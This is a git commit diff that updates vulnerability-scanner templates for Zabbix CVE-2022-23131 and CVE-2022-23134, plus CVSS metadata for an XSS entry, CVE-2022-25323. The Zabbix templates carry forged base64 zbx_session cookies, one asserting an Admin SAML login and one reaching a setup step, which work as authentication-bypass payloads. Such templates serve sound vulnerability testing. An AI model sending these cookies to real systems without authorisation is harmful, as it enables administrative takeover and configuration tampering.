Merge branch 'master' into redash

2022-02-25 12:43:33 -06:00 · 2022-02-25 12:43:33 -06:00 · 148324c161
parent a8826a4e54 070e52ee3e
commit 148324c161
4 changed files with 21 additions and 7 deletions
--- a/.new-additions
+++ b/.new-additions
@ -0,0 +1 @@
+cves/2022/CVE-2022-23134.yaml
--- a/cves/2022/CVE-2022-23131.yaml
+++ b/cves/2022/CVE-2022-23131.yaml
@ -19,12 +19,15 @@ info:
  tags: cve,cve2022,zabbix,auth-bypass,saml,sso

 requests:
-  - raw:
-      - |
-        GET /index_sso.php HTTP/1.1
-        Host: {{Hostname}}
-        Cookie: zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9
+  - method: GET
+    path:
+      - "{{BaseURL}}/zabbix/index_sso.php"
+      - "{{BaseURL}}/index_sso.php"

+    headers:
+      Cookie: "zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9"
+
+    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
--- a/cves/2022/CVE-2022-23134.yaml
+++ b/cves/2022/CVE-2022-23134.yaml
@ -1,10 +1,10 @@
 id: CVE-2022-23134

 info:
-  name: CVE-2022-23134
+  name: Zabbix Setup Configuration - Unauthenticated Access
  author: bananabr
  severity: medium
-  description: Bypass authentication on critical endpoints.
+  description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators, but by unauthenticated users as well. Malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend.
  reference:
    - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
    - https://nvd.nist.gov/vuln/detail/CVE-2022-23134
@ -19,8 +19,11 @@ requests:
    path:
      - "{{BaseURL}}/zabbix/setup.php"
      - "{{BaseURL}}/setup.php"
+
    headers:
      Cookie: "zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D"
+
+    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
@ -28,7 +31,9 @@ requests:
          - "Database"
          - "host"
          - "port"
+          - "Zabbix"
        condition: and
+
      - type: status
        status:
          - 200
--- a/cves/2022/CVE-2022-25323.yaml
+++ b/cves/2022/CVE-2022-25323.yaml
@ -9,6 +9,11 @@ info:
    - https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-25323
  tags: xss,cve,cve2022,zerof
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2022-25323
+    cwe-id: CWE-79

 requests:
  - method: GET